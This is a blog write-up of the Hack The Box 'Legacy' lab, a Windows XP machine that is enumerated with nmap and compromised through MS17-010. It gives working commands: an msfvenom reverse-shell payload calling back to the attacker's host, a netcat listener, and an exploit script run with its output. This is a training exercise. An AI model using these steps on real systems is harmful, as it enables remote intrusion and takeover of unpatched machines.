Posts Hack The Box - Legacy Writeup
Post
Cancel

Hack The Box - Legacy Writeup

58a6315786eada3a0dba9399b6ad0308.png

IPOSDifficultyRelease Date
10.10.10.4WindowsEasy15 March 2017

Enumeration

The first steps with any box is to scan to find any open ports and running services.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
nmap -sC -sV -T4 -v 10.10.10.4 -Pn

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m53s, deviation: 2h07m16s, median: 4d22h57m53s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:76:53 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-06-20T15:44:43+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Nmap done: 1 IP address (1 host up) scanned in 62.61 seconds

We find that the box does not respond to ping so we have to use the -Pn argument to get a response. once we get a response we see that this a Windows XP/Windows Server box with a running smb server.

Check SMB for vulnerabilities

SMB versions this old are vulnerable to a few exploits. We can use nmap again to scan the box to check with vulnerability exists on this box.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
kali@kali:~$ nmap --script vuln -p139,445 10.10.10.4 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 06:52 EDT

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 24.48 seconds

Our nmap scan reveals two vulnerabilities. ms08-067 (CVE-2008-4250) and ms17-010 (CVE-2017-0143).

Exploitation

Exploiting MS17-010 (without Metasploit)

To gain access to this box we will use the MS17-010 vulnerability. There are several methods of exploiting this vulnerability but the method here uses an OSCP friendly non metasploit method.

Download and install impacket

If you don’t have impacket installed, follow the instructions on the GitHub repo.

Download send_and_execute.py

Clone this GitHub repo. We will need the send_and_execute.py python script to send our payload to the box.

Generate our payload with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

This command will generate a .exe file that will open a reverse TCP shell on port 443. Be sure to change the LHOST to your IP Address. (run ifconfig to check this.)

Start a netcat listener

Open a new terminal session and run the command nc -nvlp 443. (Note: Make sure the port is the same as used in your msfvenom payload).

Run the exploit

Now that we have all of requirements met to run this exploit we can execute this with a single command. Open a new terminal session and run the below command replacing the file with the name and location of our payload generated with msfvenom.

python send_and_execute.py 10.10.10.4 /home/kali/Desktop/ms17-010.exe

We should see an output similar to below after a few moments.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820aa9e8
SESSION: 0xe218d3d0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe228cd50
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe228cdf0
overwriting token UserAndGroups
Sending file Q5OAXA.exe...
Opening SVCManager on 10.10.10.4.....
Creating service fdUr.....
Starting service fdUr.....
The NETBIOS connection with the remote host timed out.
Removing service fdUr.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

The exploit will upload our payload and execute. Looking at our netcat session we started earlier, we should see that we now have a shell. This is a full administrator shell and the flags can be found in Documents and Settings in their respective users folders.

This post is licensed under CC BY 4.0 by the author.